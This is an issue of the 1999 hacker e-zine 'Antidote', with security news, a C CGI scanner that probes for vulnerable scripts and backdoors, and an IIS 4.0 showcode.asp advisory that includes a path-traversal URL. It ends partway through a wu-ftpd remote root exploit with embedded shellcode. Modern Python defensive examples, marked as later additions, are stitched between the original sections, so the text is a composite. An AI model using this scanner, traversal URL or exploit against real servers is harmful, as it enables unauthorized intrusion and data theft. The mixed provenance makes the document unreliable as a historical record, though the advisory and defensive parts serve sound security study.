Antidote Vol. 02 Issue 03
Volume 2 Issue 3
5/10/99
http://www.thepoison.org/antidote
------------------------------
Here is another issue of Antidote that has been released. Right now we have over
415 subscribers and are getting more and more subscribers every day. We are very
sorry to say that we are not going to be sending Antidote as an attachment anymore
because we have gotten so many subscribers that our mail server is going ape shit
when we send them (we don't have a mail server just for Antidote). What we are going
to start to do is just e-mail everyone the URL where they can download the new issue
of Antidote. So you will start receiving e-mails about every week telling you that a
new issue of Antidote has been released and where you can get it. Sorry if this is an
inconvenience to anyone, but it is such a hassle to send this as an attachment
because of the mail server. The last issue that we sent as an attachment took us over
2 and a half hours to send to all of the users because of problems, and the mail
server kept crashing because of it.
At Antidote, we never ask anything from anyone except articles, which are optional,
but now we ask that you please visit our sponsor, because we have to pay for the
domain (www.thepoison.org) and it is getting to be too expensive to keep it up,
though we don't want to take it down. So please take 2 seconds out of your time and
please visit:
http://www.websponsors.com/cgi-bin/ad_click.cgi?userid=8189&offerid=242
Keep in mind that we are asking 2 seconds of your time to go to our sponsor, while
this e-zine took us over a week to write. That's the least you can do. Take 2 seconds
and we take a week.
--=\\Contents\\=--
0.00 - Beginning
0.01 - What?
0.02 - FAQ
0.03 - Shouts
0.04 - Writing
1.00 - News & Exploits
1.01 - Army Survival Training
1.02 - Free e-mail isn't Safe?
1.03 - CGIchk
1.04 - IIS 4.0
1.05 - wu-ftpd
1.06 - ippooper
2.00 - Misc
2.01 - Understanding a Computer Virus
2.02 - Dropping Phonelines
2.03 - Cold Fusion Scanner
------------------------------
--=\\0.00\\=--
0.01 --=\\What?\\=--
What is 'Antidote'? Well, we wouldn't say that Antidote is a hacking magazine, cause
that would be wrong. We don't claim to be a hacking magazine. All Antidote is, is
basically current news and happenings in the underground world. We aren't going to
teach you how to hack or anything, but we will supply you with the current
information and exploits. Mainly Antidote is just a magazine for people to read if
they have some extra time on their hands and are bored with nothing to do. If you
want to read a magazine that teaches you how to hack etc, then you might want to go
to your local bookstore and see if they carry '2600'.
------------------------------
0.02 --=\\FAQ\\=--
Here are a lot of questions that we seem to receive a lot, or our "Frequently Asked
Questions". Please read this before e-mailing us with questions and if the question
isn't on here or doesn't make sense, then you can e-mail us with your question.
> What exactly is "Antidote"?
See section 0.01 for a complete description.
> I find Antidote to not be shot for the beginner or does not teach you the basics,
why is that?
Antidote is for everyone. All we are, basically, is a news ezine that comes out once
a week with the current news, exploits, flaws and even programming. All of the
articles that are in here are received second hand (sent to us) and we very rarely
edit anyone's articles.
> I just found Antidote issues on your webpage, is there anyway I can get them sent
to me through e-mail?
Yes, if you go to www.thepoison.org/antidote there should be a text box where you
can input your e-mail address. You will receive Antidote the second we release it
and it will be sent as an attachment.
> If I want to submit something, are there any 'rules'?
Please see section 0.03 for a complete description.
> If I submitted something, can I remain anonymous?
Yes. Just make sure that you specify what information about yourself you would
like to be published above your article (when sending it to us) and we will do
what you say.
> I submitted something and I didn't see it in the current/last issue, why is that?
It could be that someone else wrote something similar to what you wrote and they
sent it to us first. If you sent us something and we didn't e-mail you back, then
you might want to send it again because we probably didn't get it (we respond to
all e-mails no matter what). We might use your article in future issues of
Antidote.
> Can I submit something that I didn't "discover" or "write"?
Yes you can, we take information that is written by anyone regardless if you wrote
it or not.
Well, that's it for our FAQ. If you have a question that is not on here or the
question is on here and you had trouble understanding it, then please feel free to
e-mail lordoak@thepoison.org and he will answer your question. This FAQ will
probably be updated every month.
------------------------------
0.03 --=\\Shouts\\=--
These are just some shout outs that we feel we owe to some people. Some are
individuals and some are groups in general. If you are not on this list and you feel
that for some reason you should be, then please contact Lord Oak and he will post
you on here, and we are sorry for the misunderstanding. Well, here are the shout outs:
Duece               ox1dation
Lord Oak            Forlorn
Altomo              0dnek
PBBSER              HNN [www.hackernews.com]
Thepoison.org       Retribution
403-security.org    EazyMoney
Like we said above, if we forgot you and/or you think you should be added, please
e-mail lordoak@thepoison.org and he will be sure to add you.
------------------------------
0.04 --=\\Writing\\=--
As many of you know, we are always open to articles/submissions. We will take almost
anything that has to do with computer security. This leaves you open for:
-Protecting the system (security/securing)
-Attacking the system (hacking, exploits, flaws, etc....)
-UNIX (really anything to do with it...)
-News that has to do with any of the above....
The only thing that we really don't take is webpage hacks, like e-mailing us and
saying "www.xxx.com" was hacked... But if you have an opinion about the hacks that
is fine. If you have any questions about what is "acceptable" and not, please feel
free to e-mail Lord Oak [lordoak@thepoison.org] with your question and he will
answer it. Also, please note that if we receive two e-mails with the same topic/idea
then we will use the one that we received first. So it might be a good idea to
e-mail one of us and ask us if someone has written about/on this topic so that way
you don't waste your time on writing something that won't be published. An example
of this would be:
If Joe sends us an e-mail with the topic being on hacking hotmail accounts on
Thursday,
and then Bill sends us an e-mail on hacking hotmail accounts on Sunday, we will
take Joe's article because he sent it in first.
But keep in mind, we might use your article for the next issue! If you have
something that you would like to submit to Antidote, please e-mail
lordoak@thepoison.org or duece@thepoison.org and one of us will review the article
and put it in Antidote (if we like it).
------------------------------
_________________________________
) ___ (
( //___/ / // ) ) // ) ) )
) /____ / // / / __ / / (
( / / // / / ) ) )
) / / ((___/ / ((___/ / (
( http://www.403-security.org )
) For the latest hacks and news (
(___________________________________)
--=\\1.00\\=--
1.01 --=\\Army Survival Training\\=--
[www.fcw.com]
BY DANIEL VERTON (dan_verton@fcw.com)
SALT LAKE CITY -- The Army this fall plans to offer an online graduate-level
training course on information systems survivability, teaching engineers to develop
systems capable of surviving any kind of technical glitch and network attack.
The new 14-week Infosurv course will be offered through the University of Maryland
as an online, distance-learning initiative sponsored by the Army Research Laboratory
in Adelphi, Md. During the course, students with a basic engineering background will
build on their education with instruction on reliability, security and performance
risks that must be addressed early in the life cycle of an information system.
According to Lt. Col. Paul Walczak, senior computer scientist at the Army Research
Laboratory, the concept of Infosurv has been around for about 10 years, growing out
of research conducted at the Army Research Laboratory. Survivability, Walczak said,
can best be defined as a system's ability to withstand hardware faults, software
flaws, network attacks by hackers and electromagnetic interference. When one of
these types of failures brings a system or a portion of a system down, the rest of
the information infrastructure must be capable of operating, he said.
"This is a serious attempt by the Army Research Lab to institutionalize the
concept," Walczak said. Until now, reliability, survivability and security have been
features that systems developers have "bolted on" after the development process
started, he said. The goal is to build these requirements into the system design
before development work begins, he said.
The Army plans to transmit live courses each Thursday from a lecture room on the
College Park, Md., campus to as many as 16 satellite locations. "We plan to beam
this course out to as many sites as are interested in it," said Walczak, who noted
that the University of Tennessee, Pennsylvania State University and Harvard
University also have expressed interest in taking part in future courses.
Peter Neumann, principal scientist at the Computer Science Laboratory at SRI
International and the principal investigator for Infosurv research, will be the
primary instructor for the course. The course will act as the core course in a new
four-course masters-level certificate program in survivable systems, and it also can
be used as credit toward a regular degree program.
http://www.fcw.com/pubs/fcw/1999/0503/web-army-5-5-99.html
------------------------------
1.02 --=\\Free E-mail isn't safe?\\=--
[comments by Lord Oak] As we all know, hotmail and yahoo's free e-mail services have
had a lot of vulnerabilities and security problems in the past. We know that the
vulnerabilities are old, but we thought that this article was a good one to explain
the "danger" your e-mail might be in if you use hotmail, yahoo or any other
web-based free e-mail.
[www.eurekalert.org]
Free Web-based e-mail services are vulnerable to hackers, according to an analysis
by the Internet Security Advisors Group, a consultancy in Severna Park, Maryland. In
its security probe, ISAG focused on the three biggest and most firmly established
Web-based free e-mail services: Microsoft's Hotmail, YahooMail and Excite Mail. It
found that all three failed to provide a basic security feature that helps keep
hackers out.
The major mistake made by all the service providers was to allow users an unlimited
number of attempts to log on, rather than locking them out after a couple of
attempts if they got the password wrong. This, says Ira Winkler, president of ISAG,
makes it possible for hackers to guess a password by brute force, using what is known
as an automated dictionary attack, which tries vast numbers of different passwords
until the correct one is found.
This, Winkler says, is a basic information security issue the service providers
should have got right. In addition, ISAG found that many Web-based e-mail systems
also fail to encrypt their passwords when they are sent over the Net, making them
easy prey for hackers to intercept. Some hackers collect passwords, logging into e-
mail accounts and sending bogus messages.
Last week, Hotmail tightened its security in response to ISAG's findings. Its log-in
protocol now incorporates a slight delay when the password is entered. For each
wrong attempt the delay increases, making any automated attack take an unfeasibly
long time. "There's no impact on members who log in successfully," says Laura
Norman, a project manager at Hotmail, "but this should deter potential dictionary
attacks." Yahoo has also made changes to its password security system and Excite is
believed to be considering the matter.
http://www.eurekalert.org/releases/ns-fes050499.html
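The growing delay described in the article, as an added example (not code from Hotmail, ISAG or Antidote). The article gives no numbers, so the schedule here (1 second, doubling per wrong attempt, capped at 300 seconds), the per-account keying and all names are assumptions.

```python
# Added example: per-account login throttle with a delay that grows after
# every wrong password and resets on success. Schedule values are assumed.

class LoginThrottle:
    def __init__(self, base_delay=1.0, factor=2.0, max_delay=300.0):
        self.base_delay = base_delay
        self.factor = factor
        self.max_delay = max_delay
        self.state = {}  # account -> (consecutive failures, earliest next try)

    def delay_after(self, failures):
        """Seconds a client must wait after its Nth consecutive failure."""
        if failures <= 0:
            return 0.0
        exponent = min(failures - 1, 32)  # keep the power bounded
        return min(self.base_delay * self.factor ** exponent, self.max_delay)

    def attempt(self, account, password_ok, now):
        """Return (status, seconds_to_wait) for one login attempt at time `now`.

        `password_ok` is the result of the real credential check, which is
        outside the scope of this example.
        """
        key = account.strip().lower()
        failures, not_before = self.state.get(key, (0, 0.0))
        if now < not_before:
            # Still inside the penalty window: refuse without even looking
            # at the password, so early guesses gain nothing.
            return ("throttled", not_before - now)
        if password_ok:
            self.state.pop(key, None)  # success clears the history
            return ("ok", 0.0)
        failures += 1
        wait = self.delay_after(failures)
        self.state[key] = (failures, now + wait)
        return ("denied", wait)


def seconds_to_exhaust(throttle, account, wrong_guesses):
    """Simulated time an automated guesser spends serving delays while
    submitting `wrong_guesses` bad passwords back to back."""
    now = 0.0
    for _ in range(wrong_guesses):
        _status, wait = throttle.attempt(account, False, now)
        now += wait  # the guesser waits exactly as long as required
    return now


if __name__ == "__main__":
    t = LoginThrottle()
    # A member who mistypes once and then logs in correctly loses one second.
    print(t.attempt("alice", False, 0.0))
    print(t.attempt("alice", True, 1.0))
    # A 1000-word dictionary run against one account.
    total = seconds_to_exhaust(LoginThrottle(), "bob", 1000)
    print("1000 wrong guesses cost %.0f s (about %.1f days)" % (total, total / 86400))
```

Keying on the account name alone means anyone can slow down logins for an account they do not own by failing on purpose; keying on account plus source address is a common variation.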
------------------------------
1.03 --=\\CGIchk\\=--
This is a CGI scanner that scans over 55 KNOWN cgi vulnerabilities.
/* ---------------------------------------------------------------------- */
/* CGI scanner v1.33, m0dify and recode by su1d sh3ll //UnlG 1999 */
/* Tested on Slackware linux with kernel 2.0.35;2.0.36; */
/* FreeBSD 2.2.2-3.1;IRIX 5.3 */
/* Source c0de by [CKS & Fdisk] */
/* Gr33tz to: Packet St0rm and Ken, ADM crew, ech0 security and CKS, ch4x,*/
/* el8.org users, #c0de, rain.forest.puppy/[WT], MnemoniX , */
/* hypoclear of lUSt */
/* Fuck to: www.hackzone.ru , HDT... CHC fuck u 2 llamaz-scr1pt k1dd1ez */
/* hey! v0rt-fu if u kewl programmer u must write u own proggi, */
/* and stop modify th1s scanner...(i can do it better and CKS ;) */
/* hmm, remember if u can add 2 CGi to scanner u can't change */
/* real Version number and name.....better go read 'C' Bible ;-) */
/* c0m1ng s00n: hmmm.... i forgot 8-) again forgot... :-) */
/* -----------------------------------------------[02:30 04.05.99 UnlG]- */
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/nameser.h>
#include <sys/stat.h>
#include <strings.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
void main(int argc, char *argv[])
{
int sock,debugm=0;
struct in_addr addr;
struct sockaddr_in sin;
struct hostent *he;
unsigned long start;
unsigned long end;
unsigned long counter;
char foundmsg[] = "200";
char *cgistr;
char buffer[1024];
int count=0;
int numin;
char cgibuff[1024];
char *buff[100]; /* Don't u think 100 is enought? ;-)*/
char *cginame[100]; /* Don't u think 100 is enought? */
buff[1] = "GET /cgi-bin/unlg1.1 HTTP/1.0\n\n";
/* v0rt-fu when u modify source, check this first line.... that's my 8-) */
buff[2] = "GET /cgi-bin/rwwwshell.pl HTTP/1.0\n\n";
buff[3] = "GET /cgi-bin/phf HTTP/1.0\n\n";
buff[4] = "GET /cgi-bin/Count.cgi HTTP/1.0\n\n";
buff[5] = "GET /cgi-bin/test-cgi HTTP/1.0\n\n";
buff[6] = "GET /cgi-bin/nph-test-cgi HTTP/1.0\n\n";
buff[7] = "GET /cgi-bin/php.cgi HTTP/1.0\n\n";
buff[8] = "GET /cgi-bin/handler HTTP/1.0\n\n";
buff[9] = "GET /cgi-bin/webgais HTTP/1.0\n\n";
buff[10] = "GET /cgi-bin/websendmail HTTP/1.0\n\n";
buff[11] = "GET /cgi-bin/webdist.cgi HTTP/1.0\n\n";
buff[12] = "GET /cgi-bin/faxsurvey HTTP/1.0\n\n";
buff[13] = "GET /cgi-bin/htmlscript HTTP/1.0\n\n";
buff[14] = "GET /cgi-bin/pfdispaly.cgi HTTP/1.0\n\n";
buff[15] = "GET /cgi-bin/perl.exe HTTP/1.0\n\n";
buff[16] = "GET /cgi-bin/wwwboard.pl HTTP/1.0\n\n";
buff[17] = "GET /cgi-bin/www-sql HTTP/1.0\n\n";
buff[18] = "GET /cgi-bin/view-source HTTP/1.0\n\n";
buff[19] = "GET /cgi-bin/campas HTTP/1.0\n\n";
buff[20] = "GET /cgi-bin/aglimpse HTTP/1.0\n\n";
buff[21] = "GET /cgi-bin/glimpse HTTP/1.0\n\n";
buff[22] = "GET /cgi-bin/man.sh HTTP/1.0\n\n";
buff[23] = "GET /cgi-bin/AT-admin.cgi HTTP/1.0\n\n";
buff[24] = "GET /cgi-bin/filemail.pl HTTP/1.0\n\n";
buff[25] = "GET /cgi-bin/maillist.pl HTTP/1.0\n\n";
buff[26] = "GET /cgi-bin/jj HTTP/1.0\n\n";
buff[27] = "GET /cgi-bin/info2www HTTP/1.0\n\n";
buff[28] = "GET /cgi-bin/files.pl HTTP/1.0\n\n";
buff[29] = "GET /cgi-bin/finger HTTP/1.0\n\n";
buff[30] = "GET /cgi-bin/bnbform.cgi HTTP/1.0\n\n";
buff[31] = "GET /cgi-bin/survey.cgi HTTP/1.0\n\n";
buff[32] = "GET /cgi-bin/AnyForm2 HTTP/1.0\n\n";
buff[33] = "GET /cgi-bin/textcounter.pl HTTP/1.0\n\n";
buff[34] = "GET /cgi-bin/classifieds.cgi HTTP/1.0\n\n";
buff[35] = "GET /cgi-bin/environ.cgi HTTP/1.0\n\n";
buff[36] = "GET /_vti_pvt/service.pwd HTTP/1.0\n\n";
buff[37] = "GET /_vti_pvt/users.pwd HTTP/1.0\n\n";
buff[38] = "GET /_vti_pvt/authors.pwd HTTP/1.0\n\n";
buff[39] = "GET /_vti_pvt/administrators.pwd HTTP/1.0\n\n";
buff[40] = "GET /_vti_pvt/shtml.dll HTTP/1.0\n\n";
buff[41] = "GET /_vti_pvt/shtml.exe HTTP/1.0\n\n";
buff[42] = "GET /cgi-dos/args.bat HTTP/1.0\n\n";
buff[43] = "GET /cgi-win/uploader.exe HTTP/1.0\n\n";
buff[44] = "GET /scripts/issadmin/bdir.htr HTTP/1.0\n\n";
buff[45] = "GET /scripts/CGImail.exe HTTP/1.0\n\n";
buff[46] = "GET /scripts/tools/newdsn.exe HTTP/1.0\n\n";
buff[47] = "GET /scripts/fpcount.exe HTTP/1.0\n\n";
buff[48] = "GET /cfdocs/expelval/openfile.cfm HTTP/1.0\n\n";
buff[49] = "GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0\n\n";
buff[50] = "GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0\n\n";
buff[51] = "GET /cfdocs/expelval/sendmail.cfm HTTP/1.0\n\n";
buff[52] = "GET /search97.vts HTTP/1.0\n\n";
buff[53] = "GET /carbo.dll HTTP/1.0\n\n"; /* we have at archive about 70 CGi ,
rule? ;-) */
cginame[1] = "UnlG - backd00r ";
cginame[2] = "THC - backd00r ";
cginame[3] = "phf..classic :) ";
cginame[4] = "Count.cgi ";
cginame[5] = "test-cgi ";
cginame[6] = "nph-test-cgi ";
cginame[7] = "php.cgi ";
cginame[8] = "handler ";
cginame[9] = "webgais ";
cginame[10] = "websendmail ";
cginame[11] = "webdist.cgi ";
cginame[12] = "faxsurvey ";
cginame[13] = "htmlscript ";
cginame[14] = "pfdisplay ";
cginame[15] = "perl.exe ";
cginame[16] = "wwwboard.pl ";
cginame[17] = "www-sql ";
cginame[18] = "view-source ";
cginame[19] = "campas ";
cginame[20] = "aglimpse ";
cginame[21] = "glimpse ";
cginame[22] = "man.sh ";
cginame[23] = "AT-admin.cgi ";
cginame[24] = "filemail.pl ";
cginame[25] = "maillist.pl ";
cginame[26] = "jj ";
cginame[27] = "info2www ";
cginame[28] = "files.pl ";
cginame[29] = "finger ";
cginame[30] = "bnbform.cgi ";
cginame[31] = "survey.cgi ";
cginame[32] = "AnyForm2 ";
cginame[33] = "textcounter.pl ";
cginame[34] = "classifields.cgi";
cginame[35] = "environ.cgi ";
cginame[36] = "service.pwd ";
cginame[37] = "users.pwd ";
cginame[38] = "authors.pwd ";
cginame[39] = "administrators ";
cginame[40] = "shtml.dll ";
cginame[41] = "shtml.exe ";
cginame[42] = "args.bat ";
cginame[43] = "uploader.exe ";
cginame[44] = "bdir - samples ";
cginame[45] = "CGImail.exe ";
cginame[46] = "newdsn.exe ";
cginame[47] = "fpcount.exe ";
cginame[48] = "openfile.cfm ";
cginame[49] = "exprcalc.cfm ";
cginame[50] = "dispopenedfile ";
cginame[51] = "sendmail.cfm ";
cginame[52] = "search97.vts ";
cginame[53] = "carbo.dll ";
if (argc<2)
{
printf("\n [-- CGI Checker 1.33. Modified by su1d sh3ll //UnlG --]");
printf("\nusage : %s host ",argv[0]);
printf("\n Or : %s host -d for debug mode\n\n",argv[0]);
exit(0);
}
if (argc>2)
{
if(strstr("-d",argv[2]))
{
debugm=1;
}
}
if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname");
exit(0);
}
printf("\n\n\t [CKS & Fdisk]'s CGI Checker - modify by su1d sh3ll 04.05.99\n\n\n");
start=inet_addr(argv[1]);
counter=ntohl(start);
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("connect");
}
printf("\n\n\t [ Press any key to check out the httpd version...... ]\n");
getchar(); /* CKS sorry, but ur new piece of code don't work :-( */
send(sock, "HEAD / HTTP/1.0\n\n",17,0);
recv(sock, buffer, sizeof(buffer),0);
printf("%s",buffer);
close(sock);
printf("\n\t [ Press any key to search 4 CGI stuff...... ]\n");
getchar();
while(count++ < 53) /* huh! 53 cgi..... no secur1ty in th1s w0rld ;-)*/
{
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("connect");
}
printf("Searching for %s : ",cginame[count]);
for(numin=0;numin < 1024;numin++)
{
cgibuff[numin] = '\0';
}
send(sock, buff[count],strlen(buff[count]),0);
recv(sock, cgibuff, sizeof(cgibuff),0);
cgistr = strstr(cgibuff,foundmsg);
if( cgistr != NULL)
printf("Found !! ;)\n");
else
printf("Not Found\n");
if(debugm==1)
{
printf("\n\n ------------------------\n %s \n ------------------------\n",cgibuff);
printf("Press any key to continue....\n"); getchar();
}
close(sock);
}
printf("...have a nice hack... ;-)\n");
}
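Seen from the server side, a run of this scanner is one client asking for many of the listed paths within a few seconds. The following added example (not part of the original scanner or of Antidote) flags that pattern in a Common Log Format access log; the log lines are constructed, and the threshold, window and function names are assumptions.

```python
# Added example: flag clients that request many of the scanner's known
# probe paths in a short time. Sample log lines below are constructed.
import re
from collections import defaultdict
from datetime import datetime, timedelta

# A subset of the request paths that appear in the scanner source above.
PROBE_PATHS = {p.lower() for p in (
    "/cgi-bin/unlg1.1", "/cgi-bin/rwwwshell.pl", "/cgi-bin/phf",
    "/cgi-bin/Count.cgi", "/cgi-bin/test-cgi", "/cgi-bin/nph-test-cgi",
    "/cgi-bin/php.cgi", "/cgi-bin/handler", "/cgi-bin/webgais",
    "/_vti_pvt/service.pwd", "/scripts/fpcount.exe", "/search97.vts",
)}

LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) \S+')


def parse(line):
    """Return (client, time, lowercased path without query, status) or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    client, stamp, _method, target, status = m.groups()
    when = datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z")
    return client, when, target.split("?", 1)[0].lower(), int(status)


def find_scanners(lines, min_paths=5, window=timedelta(seconds=60)):
    """Map each suspicious client to its probe count and to the probed
    paths that answered 200 (files that exist and should be reviewed)."""
    hits = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec and rec[2] in PROBE_PATHS:
            hits[rec[0]].append((rec[1], rec[2], rec[3]))
    report = {}
    for client, events in hits.items():
        events.sort()
        best, start = set(), 0
        for end in range(len(events)):
            # Slide the window so it never spans more than `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            paths = {p for _, p, _ in events[start:end + 1]}
            if len(paths) > len(best):
                best = paths
        if len(best) >= min_paths:
            report[client] = {
                "distinct_probes": len(best),
                "present_on_server": sorted(
                    {p for _, p, status in events if status == 200}),
            }
    return report


# Constructed sample: one ordinary visitor and one scanner run.
SAMPLE_LOG = """\
198.51.100.10 - - [10/May/1999:02:30:01 +0000] "GET /index.html HTTP/1.0" 200 5120
198.51.100.10 - - [10/May/1999:02:30:02 +0000] "GET /cgi-bin/Count.cgi?df=home.dat HTTP/1.0" 200 310
192.0.2.77 - - [10/May/1999:02:31:10 +0000] "HEAD / HTTP/1.0" 200 0
192.0.2.77 - - [10/May/1999:02:31:11 +0000] "GET /cgi-bin/unlg1.1 HTTP/1.0" 404 207
192.0.2.77 - - [10/May/1999:02:31:11 +0000] "GET /cgi-bin/rwwwshell.pl HTTP/1.0" 404 207
192.0.2.77 - - [10/May/1999:02:31:12 +0000] "GET /cgi-bin/phf HTTP/1.0" 404 207
192.0.2.77 - - [10/May/1999:02:31:12 +0000] "GET /cgi-bin/Count.cgi HTTP/1.0" 200 310
192.0.2.77 - - [10/May/1999:02:31:13 +0000] "GET /cgi-bin/test-cgi HTTP/1.0" 200 412
192.0.2.77 - - [10/May/1999:02:31:13 +0000] "GET /cgi-bin/nph-test-cgi HTTP/1.0" 404 207
192.0.2.77 - - [10/May/1999:02:31:14 +0000] "GET /cgi-bin/php.cgi HTTP/1.0" 404 207
""".splitlines()

if __name__ == "__main__":
    for client, info in find_scanners(SAMPLE_LOG).items():
        print(client, info)
```

The "present_on_server" list is the part to act on first: those are the scripts the scan found installed, so they are the ones to remove or patch.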
------------------------------
1.04 --=\\IIS 4.0\\=--
[www.l0pht.com]
-Description
Internet Information Server (IIS) 4.0 ships with a set of sample files to help web
developers learn about Active Server Pages (ASP). One of these sample files,
showcode.asp, is designed to view the source code of the sample applications via a
web browser. The showcode.asp file does inadequate security checking and allows
anyone with a web browser to view the contents of any text file on the web server.
This includes files that are outside of the document root of the webserver. Many
ecommerce web servers store transaction logs and other customer information such as
credit card numbers, shipping addresses, and purchase information in text files on
the web server. This is the type of data that could be accessed with this
vulnerability. The L0pht would like to thank Parcens for doing the initial research
on this problem.
-Details
The showcode.asp file is installed by default at the URL:
http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp
It takes 1 argument in the URL, which is the file to view. The format of this
argument is:
source=/path/filename
So to view the contents of the showcode.asp file itself the URL would be:
http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/SELECTOR/showcode.asp
This looks like a fairly dangerous sample file. It can view the contents of files on
the system, and its security check is meant to only allow the viewing of the sample
files which were in the '/msadc' directory on the system. The problem is the security
check does not test for the '..' characters within the URL. The only checking done is
if the URL contains the string '/msadc/'. This allows URLs to be created that view,
not only files outside of the samples directory, but files anywhere on the entire
file system that the web server's document root is on. For example, a URL that will
view the contents of the boot.ini file, which is in the root directory of an NT
system is:
http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/../../../../../boot.ini
This URL requires that IIS 4.0 was installed in its default location.
-Solution
For production servers, sample files should never be installed so delete the entire
/msadc/samples directory. If you must have the showcode.asp capability on
development servers the showcode.asp file should be modified to test for URLs with
'..' in them and deny those requests. For specific questions about this advisory,
please contact weld@l0pht.com
http://www.l0pht.com/advisories.html
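The check the advisory describes, next to a stricter one, as an added example (Python written for illustration, not the ASP source of showcode.asp and not L0pht's code). It goes slightly beyond the advisory's fix: besides denying '..', it decodes the value first and requires the path to begin with '/msadc/' instead of merely containing it. Function names and the third sample value are assumptions.

```python
# Added example: the "contains /msadc/" test from the advisory versus a
# check that rejects '..' and anchors the path at the samples directory.
import posixpath
from urllib.parse import unquote

SAMPLES_ROOT = "/msadc/"  # virtual directory named in the advisory


def flawed_check(source):
    """Allow the request if the path merely contains '/msadc/'.
    This is the behaviour the advisory reports."""
    return SAMPLES_ROOT in source.lower()


def hardened_check(source):
    """Allow the request only if the path stays inside /msadc/."""
    decoded = unquote(source)
    # Anything still percent-encoded after one decode, or a NUL byte,
    # is not a plain file name: deny instead of guessing.
    if "%" in decoded or "\x00" in decoded:
        return False
    path = decoded.replace("\\", "/")  # NT accepts both separators
    if not path.startswith("/"):
        return False
    # The advisory's recommended test: deny any '..' path component.
    if ".." in path.split("/"):
        return False
    # Anchor at the start of the path, not anywhere inside it.
    normalized = posixpath.normpath(path)
    return normalized.lower().startswith(SAMPLES_ROOT)


# The first two values are the 'source' arguments quoted in the advisory;
# the third is constructed to show the substring problem on its own.
SAMPLES = [
    "/msadc/Samples/SELECTOR/showcode.asp",
    "/msadc/Samples/../../../../../boot.ini",
    "/inetpub/msadc/notes.txt",
]


def evaluate(samples):
    """Return (source, flawed verdict, hardened verdict) for each value."""
    return [(s, flawed_check(s), hardened_check(s)) for s in samples]


if __name__ == "__main__":
    for source, old, new in evaluate(SAMPLES):
        print("%-45s flawed=%-5s hardened=%s" % (source, old, new))
```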
------------------------------
1.05 --=\\wu-ftpd\\=--
/*
* Remote/local exploit for wu-ftpd [12] through [18]
* gcc w00f.c -o w00f -Wall -O2
*
* Offsets/padding may need to be changed, depending on remote daemon
* compilation options. Try offsets -5000 to 5000 in increments of 100.
*
* Note: you need to use -t >0 for -any- version lower than 18.
* Coded by smiler and cossack
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
/* In a beta[12-17] shellcode_A overflow, we will not see responses
to our commands. Add option -c (use chroot code) to fix this. */
unsigned char hellcode_a[]=
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /* setuid(0) */
"\xeb\x2c\x5b\x89\xd9\x80\xc1\x06\x39\xd9\x7c\x07\x80\x01\x20"
"\xfe\xc9\xeb\xf5\x89\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c"
"\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x31\xc0\xfe\xc0\xcd"
"\x80\xe8\xcf\xff\xff\xff\xff\xff\xff"
"\x0f\x42\x49\x4e\x0f\x53\x48";
unsigned char hellcode_b[]=
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /* setuid(0) */
"\xeb\x66\x5e\x89\xf3\x80\xc3\x0f\x39\xf3\x7c\x07\x80"
"\x2b\x02\xfe\xcb\xeb\xf5\x31\xc0\x88\x46\x01\x88\x46"
"\x08\x88\x46\x10\x8d\x5e\x07\xb0\x0c\xcd\x80\x8d\x1e"
"\x31\xc9\xb0\x27\xcd\x80\x31\xc0\xb0\x3d\xcd\x80\x31"
"\xc0\x8d\x5e\x02\xb0\x0c\xcd\x80\x31\xc0\x88\x46\x03"
"\x8d\x5e\x02\xb0\x3d\xcd\x80\x89\xf3\x80\xc3\x09\x89"
"\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c\xb0\x0b\x8d"
"\x4b\x08\x8d\x53\x0c\xcd\x80\x31\xc0\xfe\xc0\xcd\x80"
"\xe8\x95\xff\xff\xff\xff\xff\xff\x43\x43\x30\x30\x31"
"\x30\x30\x31\x43\x31\x64\x6b\x70\x31\x75\x6a";
char *Fgets(char *s,int size,FILE *stream);
int ftp_command(char *buf,int success,FILE *out,char *fmt,...);
int double_up(unsigned long blah,char *doh);
int resolv(char *hostname,struct in_addr *addr);
void fatal(char *string);
int usage(char *program);
int tcp_connect(struct in_addr host,unsigned short port);
int parse_pwd(char *in,int *pwdlen);
void RunShell(int thesock);
struct type {
unsigned long ret_address;
unsigned char align; /* Use this only to offset \xff's used */
signed short pad_shift; /* how little/much padding */
unsigned char overflow_type; /* whether you have to DELE */
char *name;
};
/* ret_pos is the same for all types of overflows, you only have to change
the padding. This makes it neater, and gives the shellcode plenty of
room for nops etc
*/
#define RET_POS 190
#define FTPROOT "/home/ftp"
/* the redhat 5.0 exploit doesn't work at the moment...it must be some
trite error i am overlooking. (the shellcode exits w/ code 0375) */
struct type types[]={
{ 0xbffff340, 3, 60, 0, "BETA-18 (redhat 5.2)", },
{ 0xbfffe30e, 3,-28, 1, "BETA-16 (redhat 5.1)", },
